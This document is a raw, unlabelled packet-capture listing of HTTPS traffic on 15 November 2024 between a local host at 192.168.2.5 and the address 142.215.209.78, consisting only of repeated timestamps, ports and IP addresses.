                                                                                                                    Nov 15, 2024 18:14:15.552747011 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.552758932 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.552937984 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.553009033 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.553020000 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.553124905 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.553199053 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.553209066 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.553371906 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.553442955 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.553455114 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.553507090 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.553577900 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.553590059 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.553807974 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.553867102 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.553879023 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.554522038 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.554595947 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.554606915 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.554781914 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.554878950 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.554889917 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.554969072 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.555042982 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.555054903 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.555145979 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.555242062 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.555252075 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.555470943 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.555542946 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.555553913 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.555699110 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.555763006 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.555773020 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.555840015 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.555912971 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.555923939 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.556031942 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.556097984 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.556109905 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.556230068 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.556293964 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.556304932 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.556415081 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.556493044 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.556503057 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.556658983 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.556729078 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.556740999 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.557815075 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.557972908 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.557984114 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.558048010 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.558120012 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.558130980 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.558233976 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.558306932 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.558317900 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.558490038 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.558557987 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.558569908 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.558672905 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.558753014 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.558764935 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.558902025 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.558971882 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.558983088 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.559154987 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.559223890 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.559251070 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.559304953 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.559374094 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.559386969 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.559485912 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.559552908 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.559565067 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.559694052 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.559760094 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.559770107 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.560024977 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.560101986 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.560112953 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.560168982 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.560240984 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.560251951 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.560420990 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.560484886 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.560496092 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.560561895 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.560691118 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.560703039 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.560738087 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.560801983 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.560813904 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.592556953 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.592716932 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.592775106 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.592781067 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.592937946 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.670192003 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.670351028 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.670356989 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.670372963 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.670510054 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.670519114 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.670546055 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.670586109 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.670681953 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.670746088 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.670749903 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.670828104 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.670888901 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.670893908 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.670967102 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.671036959 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.671041012 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.671080112 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.671140909 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.671145916 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.671462059 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.671529055 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.671534061 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.671598911 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.671665907 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.671670914 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.671818018 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.671881914 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.671885967 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.671951056 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.672015905 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.672019958 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.672094107 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.672158957 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.672163010 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.672239065 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.672297955 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.672302008 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.672384977 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.672451019 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.672455072 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.672636986 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.672700882 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.672704935 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.672847033 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.672926903 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.672930956 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.672988892 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.673052073 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.673058033 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.673286915 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.673371077 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.673374891 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.673618078 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.673676014 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.673680067 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.673849106 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.673907995 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.673913956 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.674061060 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.674118042 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.674122095 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.674314022 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.674372911 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.674376965 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.674495935 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.674552917 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.674556971 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.674694061 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.674770117 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.674776077 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.674972057 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.675030947 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.675035954 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.675215006 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.675277948 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.675282001 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.675432920 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.675493002 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.675498009 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.675630093 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.675688028 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.675692081 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.675767899 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.675827980 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.675832033 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.678005934 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.678069115 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.678073883 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.678221941 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.678280115 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.678283930 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.678383112 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.678442001 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.678447008 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.684520006 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.684616089 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.684628963 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.684884071 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.684962988 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.684973955 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.685142994 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.685220003 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.685230970 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.706661940 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.706760883 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.706774950 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.712150097 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.712245941 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.712259054 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.712666988 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.712743044 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.712754965 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.713274956 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.713351011 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.713363886 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.713754892 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.713830948 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.713845015 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.714584112 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.714653015 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.714664936 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.728043079 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.728132963 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.728151083 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.774168968 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.789376020 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.789408922 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.789573908 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.789684057 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.789704084 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.789736986 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.789737940 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.789737940 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.789760113 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.790096045 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.790177107 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.790189981 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.790241003 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.790318966 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.790332079 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.790388107 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.790498018 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.790589094 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.790600061 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.790657997 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.790730000 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.790740967 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.790865898 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.790934086 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.790945053 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.791028976 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.791100979 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.791111946 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.791655064 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.791727066 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.791738033 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.791857958 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.791934967 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.791945934 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.792001963 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.792067051 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.792078972 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.792125940 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.792190075 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.792201996 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.797192097 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.797266960 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.797280073 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.803901911 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.803994894 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.804007053 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.804858923 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.804936886 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.804948092 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.805051088 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.805125952 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.805138111 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.805819988 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.805896997 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.805915117 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.805969954 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.806030035 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.806049109 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.817039967 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.817110062 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.817116022 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.817574978 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.817635059 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.817639112 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.818105936 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.818166018 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.818171024 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.818553925 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.818614006 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.818619013 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.840955019 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.841061115 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.841072083 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.845057011 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.845122099 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.845128059 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.845341921 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.845401049 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.845405102 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.846658945 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.846725941 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.846729994 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.847341061 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.847400904 CET49705443192.168.2.5142.215.209.78
                                                                                                                    Nov 15, 2024 18:14:15.847404957 CET44349705142.215.209.78192.168.2.5
                                                                                                                    Nov 15, 2024 18:14:15.847790003 CET44349705142.215.209.78192.168.2.5
